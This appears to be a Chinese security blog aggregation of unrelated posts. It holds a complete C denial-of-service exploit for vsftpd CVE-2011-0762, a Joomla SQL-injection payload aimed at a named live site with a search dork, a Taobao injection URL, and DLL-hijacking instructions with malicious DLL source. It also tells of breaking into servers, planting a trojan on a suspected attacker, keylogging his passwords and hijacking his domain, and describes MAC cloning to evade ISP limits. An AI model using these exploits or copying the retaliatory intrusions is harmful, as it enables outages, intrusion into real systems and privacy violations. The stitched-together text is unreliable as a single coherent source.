漏洞描述:

vsftpd是Very Secure FTP daemon的缩写，是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞，远程攻击者可利用此漏洞造成受影响应用程序崩溃，拒绝服务合法用户。

受影响版本：

Vsftpd 2.3.2
Vsftpd 2.3

漏洞测试：

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
 
#include <stdio .h>
#include <stdlib .h>
#include <string .h>
#include <sys types.h>
#include </sys><sys socket.h>
#include <netinet in.h>
#include <netdb .h>
 
/*
This is code of
http://cxib.net/stuff/vspoc232.c
 
PoC CVE-2011-0762 ( vsftpd )
Remote Denial of Service
 
Affected: 2.3.2
Fix: 2.3.4
 
Author:
Maksymilian Arciemowicz
 
Use:
./vspoc232 127.0.0.1 21 user pass 1
 
or read
http://securityreason.com/achievement_securityalert/95
for more information
 
Example result:
cx@cx64:~$ telnet 172.5.0.129 21
Trying 172.5.0.129...
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.
 
*/
 
int skip=0;
 
int sendftp(int stream,char *what){
        if(-1==send(stream,what,strlen(what),0))
                printf(&quot;Can't send %s\n&quot;,what);
        else
                printf(&quot;send: %s\n&quot;,what);
 
        bzero(what,sizeof(what));
}
 
void readftp(int stream){
        char readline[4096];
        if(recv(stream,readline,4096,0)&lt;1)
        if(!skip) exit(1); // end
        else
           printf(&quot;recv: %s\n&quot;,readline);
 
}
 
int sendstat(host,port,login,pass)
        char *host,*port,*login,*pass;
{
        char buffer[4097]; // send ftp command buffor
        int     sockfd,n,error;
        struct addrinfo hints;
    struct addrinfo *res, *res0;
 
        memset(&amp;hints, 0, sizeof(hints));
        hints.ai_family = PF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        error = getaddrinfo(host,port,&amp;hints,&amp;res0);
 
        if (error){
                errorcon:
                printf(&quot;Can`t connect\n.exit&quot;);
                exit(1);
        }
 
        if((sockfd=socket(res0-&gt;ai_family,res0-&gt;ai_socktype, res0-&gt;ai_protocol))&lt;0) goto errorcon;
        if(-1==connect(sockfd,res0-&gt;ai_addr,res0-&gt;ai_addrlen)) goto errorcon;
 
        readftp(sockfd);
        snprintf(buffer,4096,&quot;USER %s\nPASS %s\n\n&quot;,login,pass);
        sendftp(sockfd,buffer);
        readftp(sockfd);
 
        snprintf(buffer,4096,&quot;STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}\n&quot;);
        sendftp(sockfd,buffer);
        freeaddrinfo(res0);
}
 
int main(int argc,char *argv[])
{
        char *login,*pass,logindef[]=&quot;anonymous&quot;,passdef[]=&quot;cxib.net@127.0.0.1&quot;;
 
        if(argc&lt;3){
                printf(&quot;\nUse: ./vspoc232 host port [username] [password] [option]\nhost and port are requied\nuse option = 1 to skip recv() fails\n\nexample:\n./vspoc232 127.0.0.1 21 user pass 1\n\n&quot;);
                exit(1);
        }
 
        char *host=argv[1];
        char *port=argv[2];
 
        if(4&lt;=argc) login=argv[3];
        else login=logindef;
 
        if(5&lt;=argc) pass=argv[4];
        else pass=passdef;
 
        if(6&lt;=argc) skip=1;
 
        while(1){
                printf(&quot;----------------------------- next\n&quot;);
                sendstat(host,port,login,pass);
                sleep(1); // some delay to be sure
        }
        return 0; // never happen
}</netdb></netinet></sys></string></stdlib></stdio>

别急，有补丁：

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://vsftpd.beasts.org/

via http://sebug.net/vulndb/20359/

Data URI是由RFC 2397定义的一种把小文件直接嵌入文档的方案。通过如下语法就可以把小文件变成指定编码直接嵌入到页面中：

使用方法：

background:url(data:image/png;base64,iVBORw0KG...kSuQmCC)

下载(~248KB)：115网盘 | Box.net | BRSBOX

via:http://c7sky.com/image2datauri.html

       1、底层基本api或者结构漏洞。这种漏洞有的可以勉强说不是一个漏洞，而是一类漏洞了。最有代表的是webdav漏洞。windows方面最有价值的漏洞,个人认为是webdav修补的这个漏洞，其实这个漏洞不能叫为webdav漏洞，因为webdav漏洞只是其利用的一个方面。微软修补的asp include漏洞本质就是这个，但修补的时候没有修补到本质。因为是最基本的字符串的一个数据结构的问题，太多地方可以利用了，很多rpc、3389登陆等应该都受影响。因为windows的市场地位，所以目前可以说这个漏洞是所有漏洞中最有价值的一个漏洞。

      2、rpc漏洞。这个价值是因为其漏洞的影响范围，本人意识到其价值，2002年左右就转向了rpc的研究，很快就有了msg的成果，后来辉煌的时候就是因为有upnp、ras内网通杀，dns、wins、ras、iis等的漏洞负责穿透防火墙等配合。这个‍最有代表的是dcom漏洞，dcom漏洞出来后使得大家认识到了这种漏洞的价值，很快rpc研究就火起来了。随着这种漏洞的大量发现，防火墙等配置也起来了，使得现在这种漏洞价值已经在减小，但还是分类上可以排上个老二。

      3、iis远程漏洞。这个最有代表的是unicode漏洞。unicode、decode、cgi、webdav、asp include，太多了，也是我最辉煌的时候。

      4、smb漏洞。这个最开始可以排第三，但现在的环境可以微弱的弱势排在老三后面。这个ms08-068的漏洞很有意义，本人01-02年左右写出的利用吓着公司很多同事。这个价值目前外面还有低估。

      5、exchange、3389 、dns、wins等远程服务漏洞。其实3、4都是这个范围，但因为其3、4针对的两个服务的地位，其3、4的价值得到提升。

     ‍ 6、ie、jpg漏洞。钓鱼、病毒等流行，现在这个比较升温。

      7、word、pdf等文件格式漏洞。6也属于这个范围，因为ie的应用广泛和钓鱼的流行，使得6排名得到提升，甚至高于5的部分漏洞价值。6、7也归属于远程，但因为需要用户参与，所以影响其排名，分类排在5后面。

      8、本地提权漏洞。这个又可以分为两大类，一类是可以匿名的算老8，一类是修要登录的算老9。 由于windows系统虽然也是多用户系统，但使用上基本上也是单用户使用，所以其价值要大打折扣，其它系统上价值会高一些。windows系统的难点是突破，而不是权限，8、9的漏洞太多了。某数字公司的人认为这个是最有价值的漏洞，黑市上交易一个就几百万美金，‍http://finance.ifeng.com/news/tech/20100204/1797938.shtml原话“‍如果有谁发现了微软的本地提权漏洞，在国外黑客圈私下交易的黑市价格可以达到几百万美金一个”，能够笑掉安全圈所有人的大牙。所谓的最老0day漏洞估计是8、9中的 9（webshell下估计用不了），虽然在9中是比较好的，但分类上就决定了不是很严重的漏洞。当然ms必须把其定位在严重上，因为他们的市场环境位置可能只能说10不严重。

      10、其它的一些信息泄露、拒绝服务等漏洞。

分类中的代表：

1、webdav

2、dcom

3、unicode

4、ms-068

5、dns、wins、3389输入法漏洞。

后面的太多太杂所以也就很难有代表的。

msg、upnp等差不多可以和dcom媲美，但dcom是第一个暴露出来的，所以地位上就差远了，可以说1、2、3、4、5都有代表作。

原文地址：http://hi.baidu.com/yuange1975/blog/item/1ced99ce27c32429b600c84d.html

步骤一，ADSL宽带猫设置成自动拨号，关闭它的DHCP功能，安全选项里面要关闭SNMP功能，详细过程不再介绍。

步骤二，将ADSL猫上的网线接入路由器的WAN端口，然后对将电脑IP与路由器IP设为一个网段，打开IE（俺的是 192.168.123.254）对路由器进行设置：将广域网接类型改为静态IP（注意，不是PPPOE方式）广域网IP地址改为与ADSL猫一个IP 段，如192.168.1.2（俺的ADSL猫IP为192.168.1.1）子网掩码255.255.255.0，网关 192.168.1.1，DNS：202.99.***.***。

有些宽带提供商为了限制接入用户的数量，在认证服务器上对MAC地址进行了绑定。此时，可先将被绑定MAC地址的计算机连接至路由器LAN端口（但路由器不要连接Modem或ISP提供的接线），然后，采用路由器的MAC地址克隆功能，将该网卡的MAC地址复制到宽带路由器的WAN端口。利用宽带路由器的“MAC地址克隆”功能，突破宽带提供商的地址绑定，实现多台计算机共享上网。以TP-Link TL-R400+小型路由器为例。从被绑定MAC地址的计算机上进入路由器的Web设置页面后，在主菜单的“基本设置”下选择“初步设置”，在“广域网接口类型”栏中点击“修改”按钮，接着选择“动态IP”。保存之后，返回“初步设置”页面，在“广域网MAC地址”栏的选项之后有一个文本框，其中的内容便是本机的MAC地址，用户可以直接在文本框中修改此MAC地址，把被绑定的网卡MAC地址填入此处。如果你不清楚网卡的MAC地址，可以选择“Clone MAC（MAC地址克隆）”按钮直接将当前计算机的网卡MAC地址克隆到TL-R400+的广域网端口。保存后重新启动路由器就可以生效了。

注意：在“广域网接口类型”中一定要选择“动态IP”，否则不会出现修改广域网接口的MAC地址和克隆MAC地址选项。如果你使用的是其他接入方式，如静态IP、PPPoE等，则可以在以上设置完成后，再重新进入设置界面进行广域网类型的修改。

MAC地址克隆

目前国内有一些地区的网通或电信宽带封锁了多机共享上网，以保证ISP(网络运营商)的自身利益，由于各个城市或地区所采用的封锁方式不同，所以相应的路由器密码破解方法也有所变化，不过大多数均采用MAC地址检测机制来进行限制，它通常是将用户连入网络的首台电脑网卡MAC地址进行锁定，作为唯一合法的终端，以此来提供正常的网络连接服务。

而如果是共享上网，路由器作为网络设备本身就带有一个MAC地址，由它连接有线宽带后便占用了这个“名额”，连接在路由器上的其它电脑进行共享上网时，便会被局端检测出路由器所发出的IP数据包中夹带有其它非法MAC地址信息，这样局端便会将这些侦测出的IP数据包丢弃或封闭。

小提示：网卡发送IP数据包或其它网络层协议的数据包时，其会自动将它拆分并打包成最大1518Byte，最小64Byte的数据帧。而这个数据帧中便包括了目标MAC地址、自己的源MAC地址和数据包中的协议类型，及一个DWORD类型的CRC码。由于极个别城市会采用一次绑定MAC地址即永久生效的规则，或是采用拨号过程中变换帐号或密码的方式，所以路由器密码破解起来相对困难，需要电话通知网络运营商已更换了网卡或利用嗅探软件侦测出真实的账号或密码，这样才能在宽带路由器中设置正确的拨号参数。不过从你的描述中可以看出，你所在城市只是采用了绑定拨号主机网卡MAC地址的方式，所以使用宽带路由器的“特殊拨号”模式，便可令其发出的所有IP数据包均包含统一MAC地址信息，以此达到突破限制的目的。

共享上网方案

现在多数宽带路由器均支持“MAC地址克隆”及“主机伪装模式”等功能，可使路由器转换为单一连网设备的形式出现，以此突破局端绑定MAC地址的多机共享限制。以TP-LINK产品为例，登录到管理界面后，单击左侧菜单中的“网络参数→MAC地址克隆”选项，接着转到右侧窗口，在其中会看到路由器所使用的MAC地址为“00-14-78-B6-47-5D”。而当前登录到路由器的PC所使用MAC地址为“00-11-85-1B-0D-0C”，只要点击“克隆MAC地址”按钮，即可使路由器将本身的MAC地址转换为当前登录主机的MAC地址，并在此发送出的IP数据包中，均包含此唯一的MAC地址信息，保存修改后便能突破多机共享的限制。

几年前发布的IIS 6采用了一种“默认锁定”的方法，即不安装某些功能，或者安装以后将其默认禁用，而最新版本IIS 7则采取了更多措施。Windows Server 2008甚至没有默认安装IIS 7，而在安装的时候，IIS 7网络服务器经过配置后只提供具有匿名身份验证和本地管理的静态内容，虽然生成的只是最简单的网络服务器，但却把受到安全攻击的几率降至最小。

做到这一点是可能的，因为IIS 7已被完全模块化。让我们简单的研究一下IIS 7更加安全的原因，以及它的安全性是如何实现的。通常而言，管理员可以从40多个单独的功能模块中做出选择，实现完全自定义的安装。通过只安装某个网站所需要的功能，管理员可以大大减小潜在的攻击面，并且节省资源。

然而，请注意这只适用于清洁安装（clean install）。如果你在运行老版本的IIS，你又要升级你的Windows操作系统，所有的元数据库和IIS状态信息都会被收集并保存。结果，许多不必要的Web服务器功能会在升级时被安装到系统中。因此，企业在升级之后最好重新查看应用程序对IIS功能的依赖性，并卸载不需要的IIS模块。

更少的组件意味着更少的设置管理，以及更少的问题修补，因为人们只需要维护那些正在使用的模块附属内容。这样可以减少停机时间并提高可靠性。此外，标签混乱的IIS管理控制台已经被更加直观的GUI工具所取代，这让安全设置的可视化更加简单，理解起来也更加容易。比如，如果支持基本身份验证的组件没有安装在你的系统中，该组件的配置设置就不会出现，以免混淆视听。

那么，安全运行IIS可能需要哪些组件呢？下面列出的九个组件中，运行静态网页以及其他功能的网站都需要前六个；而需要加密服务器与客户端之间数据的人则需要第七和第八项；当你拥有一个Web farm，并且想要farm中每个Web服务器都使用相同的配置文件和加密密钥时，你将需要第九项共享配置：

1、验证组件，其中包括集成Windows验证、客户端证书验证以及基于ASP.NET格式的验证，这些验证可以让你在应用层上管理客户端注册和验证，而不是依靠Windows账户。

2、URL验证，它很好地与ASP.NET会员和角色管理整合，然后根据用户名和角色来授权或者拒绝应用程序中的URL，防止没有授权的用户去访问受限制的内容。

3、IPv4地址和域名规则（Domain Name Rules）提供了基于IP地址和域名的内容访问管理。新属性“allowUnlisted”可以更容易的阻止人们访问所有的IP地址，除非列表中允许。

4、CGI和ISAPI约束，它们允许你用CGI文件方式（.exe）和ISAPI扩展方式（.dll）启用或禁用动态内容。

5、请求过滤器，它结合了UrlScan工具中限制HTTP请求类型的功能，IIS 7将会拒绝这些包含可疑数据的请求。像Apache的mod_rewrite属性一样，它可以用正则表达式来阻止攻击或者基于动词、文件扩展名、大小、命名空间和时序的修改请求。

6、日志，它现在可以提供有关应用程序池、进程、网站、应用程序域和运行请求的实时状态信息，并且能够在整个请求与应答过程中跟踪某个请求。

7、服务器证书

8、安全套接层

9、共享配置

其他增强IIS 7安全性的功能还包括：Web服务器专用的新型内置用户帐户和组帐户。该功能启用了一个系统之间通用的安全标识符（SID），从而简化了访问控制列表管理，以及应用程序池保护机制（sandboxing）。同时，应用程序管理员可以配置哪些设置，服务器管理员都能完全控制，同时让他们直接在应用程序上做出配置的改变，无需使用管理权限去访问服务器。

IIS 7与以前的产品相比非常不同，这对用户来说是一件好事。它的设计与创建遵循了经典的安全原则，它为使用Windows系统的企业提供了一个比过去更加安全的、更容易配置和管理的Web服务器。从安全的角度看，它可能还做得不够，还不能动摇Linux和Apache工作站的地位，但是微软的确已经缩小了与它们的差距。管理员可能还需要一段时间来适应新的模块化方式以及管理工具和任务。尽管管理员都熟悉Windows操作系统和框架，但仍需要培训和进行系统测试。

查找含有漏洞的页面可以使用google搜索：inurl:"option=com_elite_experts"

攻击方法：

http://127.0.0.1/path/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=[注入代码]

攻击实例：

http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

攻击者通过控制无数的肉鸡组成的僵尸网络，对目标网站发送大量的合法请求，导致网站资源超标而拒绝服务。对于虚拟主机来说，就算空间商不限制你的流量和并发连接数，那至少也是限制CPU的。一个放在虚拟主机上的动态页面，几十个肉鸡就可攻击瘫痪。静态页？没关系，几万个肉鸡，一样让你崩溃。

杯具

几天前，我察觉到博客访问速度异常，查看日志发现被攻击，CPU逐渐飙升，还好之前配置了CDN，将刷新时间调大，帮我分担了一部分流量。没办法，只能静静等待攻击者停止。

第二天，执着的攻击者加大了攻击力度，空间商已经来信提醒资源占用过高，博客眼看就顶不住了。赶紧转移到闲置的VPN上，但效果依然不明显，攻击太强烈了。

于是，我决定由被动挨打转为防守反击，找出元凶。。。。

DDOS的攻击者是很难被发现的，成功率微乎其微。我下面写的过程绝大多数靠的是运气。。

擒凶记始末：

首先，我将VPN的apache日志下载下来，将攻击的肉鸡IP整理成列表，去除重复的，总数大概是3000多个，实际数量应该不止这些。

然后，批量扫描这些肉鸡，主要是获得操作系统信息，运气不错，找到了一个win2k3的操作系统。为什么要找这个操作系统呢？因为win2K3的很可能是一个服务器，有入侵进去的可能。个人电脑只通过IP入侵太难了。

继续深入扫描这台服务器，端口开了80，443，1433 ，3389等。判定这是一个只有一个网站和mssql数据库的服务器，是企业自用的，这样的服务器最好搞了。

网站是jsp的，麻烦。先从数据库入手，SA用户可以登录，空密码错误。在网站的logo上获得域名，以域名做密码，没想到居然进去了，人品小爆发～ 登录上去直接执行命令加了个管理员帐户，然后登录3389，一路畅通无阻，直接看到桌面了。

如此，我得到了这台肉鸡的管理员权限，接下来就是通过分析来得到攻击者的真实IP了。由于木马都是反向链接的，会定时发送数据包到攻击者的木马客户端上。我就直接监视着服务器的链接，排除了半天，终于找到一个可疑的IP：AAAA。有很大的可能，AAAA这台电脑就是攻击者操纵僵尸网络的地方。拿下这台电脑，就离找到攻击者不远了。顺便说一下，这台肉鸡administrator用户的桌面上居然还有qq和迅雷的图标，这管理员居然拿网站的服务器上qq下电影，怪不得成为人家肉鸡了呢。活J8该！！

接下来就是入侵AAAA这台电脑，扫描了一下，居然又是一个win2k3的服务器。。。看来这不是攻击者的电脑，攻击者只是拿这台服务器运行木马操控肉鸡而已，没办法，要想成功，就必须进去看看才行。

但AAAA这台服务器很不好搞，貌似是一个企业邮局系统。我入侵进去花了一个白天的时间，过程就不再赘述了。总之最后的结果是成功上传了后门，进了终端，看见了桌面。找到了一个十分可疑的用户名，到这个用户名的桌面上，我发现了一个奇怪的图标，双击打开，果然是木马客户端，肉鸡一大片一大片的上线啊！！！

没错了，就是这了，攻击者就是在这里操纵僵尸攻击我的博客的！兴奋啊兴奋！终于找到你了！但到这还没有完，我的目的是进入到攻击者的个人电脑里，我要看看他是谁！

前面说过，入侵一个没有提供任何服务的个人电脑是很难的，哪怕它不在局域网里，哪怕它没有安装防火墙，一样很难。既然强J不成，那就干脆勾引他，我把我配置好的后门放在一个压缩包里，上传到攻击者用户的桌面上，名字为：『XX集团企业网银管理系统.RAR』，XX集团是在这个邮局系统首页上找到的名字，然后把服务器上的WinRAR软件破坏掉。如果攻击者看到了这个文件，出于好奇，他一定想打开看看，但由于rar用不了，他一定会传回自己的电脑上，如果他打开了压缩包，双击了里面的install.exe文件，那么我的后门就会悄悄的运行了。至于他到底会不会上当，就只能靠运气了。。。

接下来，就是等待。。。等待。。。

一直到了今天上午，我在看 《不朽》,不错的电影。突然木马里有人上线了，我一看备注，果然是攻击者！！他上当了，他抑制不住好奇心，下载运行了我的后门！！人品大爆发！！！

我马上进入了攻击者的电脑，监视他的屏幕，翻他的硬盘，我要报复！！！

看了他浏览的一些网页历史，还有他硬盘上的一些东西，这哥们是一个90后。可惜我没能打开他的摄像头，不然就给他拍张照片了。

综合分析了一下，这人我绝对不认识，真搞不明白他为什么攻击我，也许是小P孩没事闲的吧。他电脑里有很多电子书，在我监视他的这一天里，他一直在各种网站上看资料和实践，是一个很认学的小盆友。

此时怒火已消，也就不准备怎么报复他了，而且他对我博客的攻击早就已经停止了。但为了防止他再害人，我把它木马的上线域名的密码改了，域名的指向IP改成了百度，也就是说他所有的肉鸡都会把百度当成木马客户端尝试上线，呵呵。（具体的方法是键盘记录到他的某动态域名的用户密码，还有找回密码用的邮箱的密码，然后都给改掉）。

至此，战争结束了，本文的目的是提醒大家注意安全，网络上存在着很多自以为是黑客的无聊小P孩。

最后，奉上攻击者的电脑屏幕截图N张。（照顾他的隐私，图缩小了。。这小子E文不错，总上外国站点）

一、环境变量执行优先级

说起该漏洞，先谈一下变量的优先级别：

最高

%userprofile%

%systemroot%/system32

%systemroot%

用户定义path

最低

二、软件兼容性原因导致漏洞产生

Windows 操作有不同的操作系统，而不同的操作系统里面有不同的 共享链接库（dll），这就造成了不一致，有的库XP才有，有的库win7才有，有的或者直接废弃掉了，而软件必须兼容这些，这就给 DLL Hijacking Exploit 攻击带来了可称之机。首先看一张图：

当我打开 2222.docx 文档的时候，默认会调用  winword.exe 进程打开文件，然后寻找共享链接库（dll），这里我们抓到的是：imeshare.dll、IMM32.DLL。可以看到，winword 会通过上面提到的环境变量优先级来查找dll 的位置，如果存在就加载该dll 文件。根据上面的图可以看到如下顺序：

程序安装目录—》system32 目录—》注册表的images file execution options 映象路径à 加载。

在每一步寻找dll 的时候，如果存在就马上加载。根据“有的库XP才有，有的库win7才有，有的或者直接废弃掉了”这个原因，我们就理由说：我们可以劫持攻击。攻击思路如下：“如果某一系统中废弃掉了某一个 dll 文件，而软件又要为了兼容系统，还会寻找 dll，这时候，我们就可以在他寻找的某一路径中（可以为最终路径，也就是当前目录），写入我们的恶意dll 文件，让其加载执行code。”

三、实施攻击

前提条件：

1、  软件启动时需要加载一个 dll 。

2、  软件需要的 dll 在系统中不存在（因为不同系统环境不同，很多dll已经废弃）。

3、  一个编译好的恶意dll，示例代码如下：

#include <windows .h>
 
int hax()
 
{
 
WinExec(&quot;calc&quot;, 0);
 
exit(0);
 
return 0;
 
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 
{
 
hax();
 
return 0;
 
}
</windows>

攻击：

在 winword.exe 启动时会调用 imeshare.dll，如果系统中不存在，就会在某一系统环境变量指定的路径中寻找，现在我们把制作好的 imeshare.dll 放在 doc 文档的当前目录，然后当 word 启动时，就会加载我们的恶意dll，执行恶意code。

所需要的文件。

漏洞执行成功！

四、其他软件利用

五、劫持总结

a)         Javascript Hijacking

b)         Linux shell Hijacking

c)         images file execution options hijack

d)         DLL Hijacking

e)         …..

f)          Windows shell Hijacking

所有造成劫持的原因都来源于：某个东西可被覆盖！！

思考：在其他地方是否可被劫持呢？ 思想？ 大脑？

原文地址：http://qa.taobao.com/?p=8958

因

http://mm.taobao.com/?id=mm3′+and+’1′%3D’0

中的id参数过滤不严，导致SQL注入漏洞，但貌似淘宝对数据库的错误机制进行处理，导致网页返回正常页面，但仍可直接通过注入猜解工具直接获取帐号及密码。

漏洞作者： riusksk